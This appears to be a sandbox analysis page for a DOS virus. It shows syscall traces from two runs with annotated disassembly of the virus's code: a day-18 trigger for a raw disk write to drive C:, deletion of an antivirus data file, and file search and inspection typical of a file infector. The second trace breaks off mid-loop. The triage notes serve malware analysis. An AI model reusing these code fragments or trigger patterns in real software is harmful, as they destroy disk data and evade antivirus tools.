Sample viewer

vx.netlux.org/Virus.DOS.Birgit.999.e


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:57:59.365681744Z 42 PC: 12b63 | Get date 0x12b63: cmp dl, 0x12
; Disassembly window captured around PC 0x12b63, the return address of the
; "Get date" call (DOS INT 21h function 0x2A, logged as syscall 42).
; The first instruction of the window is on the log row directly above:
;   0x12b63: cmp dl, 0x12
; INT 21h/0x2A returns the day of the month in DL, so that compare tests for
; day 0x12 (18).
;
; Date trigger: skip the next two instructions unless the day is 18.
0x12b66: jne 0x12b6c
; Day-18 path: INT 26h is the DOS absolute disk write service and AL = 2
; selects drive C:. Sector count, start sector and buffer (CX, DX, DS:BX)
; are set outside this window, so what gets written cannot be told from here.
; Triage note: a raw INT 26h from an ordinary program bypasses the file
; system and is a strong indicator of a destructive payload.
0x12b68: mov al, 2
0x12b6a: int 0x26
; Restore all general registers; presumably pairs with a pushaw located
; before this window.
0x12b6c: popaw
; INT 21h/0x47 "Get current directory": DL = 0 means the default drive and
; DS:SI (bp + 0x344) is the buffer that receives the path. Matches the log
; row "71 PC: 12b77 | Get current directory".
0x12b6d: mov ah, 0x47
0x12b6f: mov dl, 0
0x12b71: lea si, word ptr [bp + 0x344]
0x12b75: int 0x21
; Call the routine at 0x12b7e, then continue at 0x12bab (outside the window).
0x12b77: call 0x12b7e
0x12b7a: jmp 0x12bab
; NOTE(review): probably two zero data bytes decoded as an instruction. The
; jmp before it never falls through and the call targets the next address.
; Confirm against the raw bytes.
0x12b7c: add byte ptr [bx + si], al
; Routine entered by the call above: save all registers and load the word at
; bp + 0x13c into DX. The window at 0x12c0e on this page stores DX into the
; same slot right after "Get time", so the value is time-derived.
0x12b7e: pushaw
0x12b7f: mov dx, word ptr ds:[bp + 0x13c]
0x12b84: jmp 0x12b8b
; Skipped by the jmp above: INT 21h/0x4C terminates the program. How this
; exit is reached is not visible in the window.
0x12b86: nop
0x12b87: mov ah, 0x4c
0x12b89: int 0x21
; CX = 0xae (174) and SI = bp + 0x16b look like a loop count and a data
; pointer. This trace then logs exactly 174 "I/O control for devices" calls
; from PC 0x12ba6, which is consistent with a 174-pass loop issuing one
; IOCTL call per pass.
; NOTE(review): possibly a decoding loop keyed by DX. The loop body is
; outside the window, so confirm in a full disassembly.
0x12b8b: mov cx, 0xae
0x12b8e: lea si, word ptr [bp + 0x16b]
2018-12-17T22:57:59.368466778Z 71 PC: 12b77 | Get current directory
2018-12-17T22:57:59.372139143Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.374189308Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.375953551Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.379457442Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.381377376Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.383425574Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.386037619Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.387875191Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.389672379Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.392306037Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.39410413Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.395766385Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.397735746Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.399858771Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.401506965Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.403505211Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.406379577Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.408342906Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.410349595Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.413269802Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.415350769Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.417401179Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.420350507Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.421969287Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.423826402Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.426734475Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.428415447Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.429958627Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.432064728Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.433784838Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.435409352Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.437563438Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.43940264Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.441186936Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.443609116Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.445514737Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.447227548Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.448958568Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.452128353Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.454229502Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.456294952Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.459314909Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.461017932Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.462673854Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.465124667Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.466892108Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.469024872Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.471343472Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.472963179Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.474924216Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.476783647Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.479417526Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.482122659Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.485132273Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.486861069Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.488604978Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.490527915Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.492696197Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.495075354Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.49699592Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.499407105Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.501421061Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.503425Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.506317828Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.508289976Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.510216755Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.513445869Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.516003685Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.518305361Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.521326213Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.52299063Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.524567322Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.527803785Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.529945407Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.531999704Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.534037256Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.536988651Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.539037274Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.541066693Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.543893372Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.546028569Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.548221506Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.555554382Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.55849089Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.560159701Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.562276369Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.564567239Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.565954202Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.568362306Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.569905782Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.571275114Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.572846095Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.574869939Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.576232758Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.577600874Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.58118133Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.583105246Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.585029094Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.587912121Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.589883384Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.591878944Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.594613046Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.59633406Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.597997018Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.600859585Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.603400372Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.605100685Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.607255048Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.609264114Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.611244909Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.61343368Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.616179538Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.618180195Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.62058141Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.623022407Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.624837448Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.626620107Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.629100187Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.630810735Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.632628266Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.635098989Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.636931598Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.638759579Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.641315163Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.643168362Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.647232392Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.649493552Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.652162609Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.654581554Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.657501635Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.659573564Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.662486379Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.665353503Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.667228615Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.669016648Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.671507516Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.673377774Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.675288663Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.677543604Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.679791047Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.681920552Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.684024177Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.686287266Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.688227871Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.691179114Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.693175277Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.695118841Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.697256551Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.699918181Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.701827274Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.70411991Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.706457807Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.708371222Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.710241152Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.711899995Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.713139723Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.714393057Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.716299001Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.717490904Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.718766178Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.720816946Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.722218892Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.724294631Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.726478867Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.727956285Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.729217944Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.732525602Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.734726086Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.736843644Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.739851197Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.74171373Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.743762763Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.746965992Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.748860177Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.750757488Z 250 PC: 12bb5 | UNKNOWN!
2018-12-17T22:57:59.757502788Z 67 PC: 12bee | Get or set file attributes
2018-12-17T22:57:59.765722857Z 65 PC: 12bf2 | Delete file (Filename = 'ANTI-VIR.DAT')
2018-12-17T22:57:59.772706421Z 44 PC: 12c0e | Get time 0x12c0e: mov word ptr ds:[bp + 0x13c], dx
; Disassembly window captured around PC 0x12c0e, the return address of the
; "Get time" call (DOS INT 21h function 0x2C, logged as syscall 44).
; The first instruction of the window is on the log row directly above:
;   0x12c0e: mov word ptr ds:[bp + 0x13c], dx
; INT 21h/0x2C returns seconds in DH and hundredths in DL, so the word at
; bp + 0x13c receives a time-derived value. The routine at 0x12b7e on this
; page loads the same slot into DX.
;
; Go straight to the file search at 0x12c31.
0x12c13: jmp 0x12c31
; INT 21h/0x3B "Change directory" to the path at DS:DX = bp + 0x394. Not
; reached by fall-through here; its entry path is outside the window.
0x12c15: mov ah, 0x3b
0x12c17: lea dx, word ptr [bp + 0x394]
0x12c1b: int 0x21
; The byte at bp + 0x397 acts as a counter: once it equals 3 control leaves
; for 0x12c88, otherwise it is incremented and stored back.
; NOTE(review): presumably caps the number of directory changes made while
; searching. The slot sits 3 bytes after the path start, which would fit a
; ".." string plus terminator. Confirm against the data area.
0x12c1d: mov al, byte ptr ds:[bp + 0x397]
0x12c22: cmp byte ptr ds:[bp + 0x397], 3
0x12c28: je 0x12c88
0x12c2a: inc al
0x12c2c: mov byte ptr ds:[bp + 0x397], al
; INT 21h/0x4E "Find first file": CX = 0 is the attribute mask and DS:DX
; (bp + 0x253) points at the search pattern. Matches the log row
; "78 PC: 12c3d | Find first file".
0x12c31: mov ax, 0x4e00
0x12c34: mov cx, 0
0x12c37: lea dx, word ptr [bp + 0x253]
0x12c3b: int 0x21
; Carry clear means a match was found; otherwise leave for 0x12d45.
0x12c3d: jae 0x12c42
0x12c3f: jmp 0x12d45
; AX = 0x4300 is INT 21h "Get file attributes" for the name at DS:DX = 0x9e
; (log row "67 PC: 12c4b"). The push/pop pair is just a way to load AX.
; NOTE(review): 0x9e equals the default DTA at PSP offset 0x80 plus the 0x1e
; filename field, i.e. the file just found. This assumes the DTA was not
; relocated.
; Triage note: the rows that follow (a second attribute call, an open and a
; 4-byte read) look like inspection of a candidate file. Read together with
; the earlier deletion of 'ANTI-VIR.DAT', this is file-infector behaviour
; worth alerting on.
0x12c42: push 0x4300
0x12c45: pop ax
0x12c46: mov dx, 0x9e
0x12c49: int 0x21
2018-12-17T22:57:59.77671154Z 78 PC: 12c3d | Find first file
2018-12-17T22:57:59.783635309Z 67 PC: 12c4b | Get or set file attributes
2018-12-17T22:57:59.786403157Z 67 PC: 12c58 | Get or set file attributes
2018-12-17T22:57:59.789550082Z 61 PC: 12c60 | Open file (Filename = '')
2018-12-17T22:57:59.792016635Z 63 PC: 12c6f | Read file or device (Read 4 bytes on handle 2)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12736,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:36:11.267515133Z 42 PC: 12b63 | Get date 0x12b63: cmp dl, 0x12
; Disassembly window captured around PC 0x12b63, the return address of the
; "Get date" call (DOS INT 21h function 0x2A, logged as syscall 42).
; The first instruction of the window is on the log row directly above:
;   0x12b63: cmp dl, 0x12
; INT 21h/0x2A returns the day of the month in DL, so that compare tests for
; day 0x12 (18).
;
; Date trigger: skip the next two instructions unless the day is 18.
0x12b66: jne 0x12b6c
; Day-18 path: INT 26h is the DOS absolute disk write service and AL = 2
; selects drive C:. Sector count, start sector and buffer (CX, DX, DS:BX)
; are set outside this window, so what gets written cannot be told from here.
; Triage note: a raw INT 26h from an ordinary program bypasses the file
; system and is a strong indicator of a destructive payload.
0x12b68: mov al, 2
0x12b6a: int 0x26
; Restore all general registers; presumably pairs with a pushaw located
; before this window.
0x12b6c: popaw
; INT 21h/0x47 "Get current directory": DL = 0 means the default drive and
; DS:SI (bp + 0x344) is the buffer that receives the path. Matches the log
; row "71 PC: 12b77 | Get current directory".
0x12b6d: mov ah, 0x47
0x12b6f: mov dl, 0
0x12b71: lea si, word ptr [bp + 0x344]
0x12b75: int 0x21
; Call the routine at 0x12b7e, then continue at 0x12bab (outside the window).
0x12b77: call 0x12b7e
0x12b7a: jmp 0x12bab
; NOTE(review): probably two zero data bytes decoded as an instruction. The
; jmp before it never falls through and the call targets the next address.
; Confirm against the raw bytes.
0x12b7c: add byte ptr [bx + si], al
; Routine entered by the call above: save all registers and load the word at
; bp + 0x13c into DX. The window at 0x12c0e on this page stores DX into the
; same slot right after "Get time", so the value is time-derived.
0x12b7e: pushaw
0x12b7f: mov dx, word ptr ds:[bp + 0x13c]
0x12b84: jmp 0x12b8b
; Skipped by the jmp above: INT 21h/0x4C terminates the program. How this
; exit is reached is not visible in the window.
0x12b86: nop
0x12b87: mov ah, 0x4c
0x12b89: int 0x21
; CX = 0xae (174) and SI = bp + 0x16b look like a loop count and a data
; pointer. This trace then logs exactly 174 "I/O control for devices" calls
; from PC 0x12ba6, which is consistent with a 174-pass loop issuing one
; IOCTL call per pass.
; NOTE(review): possibly a decoding loop keyed by DX. The loop body is
; outside the window, so confirm in a full disassembly.
0x12b8b: mov cx, 0xae
0x12b8e: lea si, word ptr [bp + 0x16b]
2018-12-25T12:36:11.269658587Z 71 PC: 12b77 | Get current directory
2018-12-25T12:36:11.273489405Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-25T12:36:11.275113636Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.276773363Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.279166556Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.280964775Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.282520884Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.284578365Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.285965945Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.287329813Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.289191921Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.290309605Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.29141652Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.292880948Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.294519499Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.29591807Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.298202457Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.300205974Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.302058495Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.303885581Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.306185203Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.308200894Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.310207216Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.312858344Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.314792592Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.31670214Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.319175636Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.321128684Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.323030563Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.336362156Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.344899392Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.346539715Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.352894668Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.354560822Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.356193632Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.362889929Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.364524935Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.366121246Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.367916396Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.37031037Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.37220956Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.37409267Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.37686247Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.378746425Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.380647545Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.38314538Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.384799Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.386386928Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.388767118Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.391483575Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.39306006Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.395101182Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.396791277Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.398435896Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.400389806Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.401993852Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.403458026Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.405791475Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.407706498Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.409275005Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.41135208Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.413019988Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.414933417Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.416318518Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.41929167Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.420974102Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.423228386Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.425308436Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.426913209Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.428460417Z 68 PC: 12ba6 | I/O control for devices (See above)
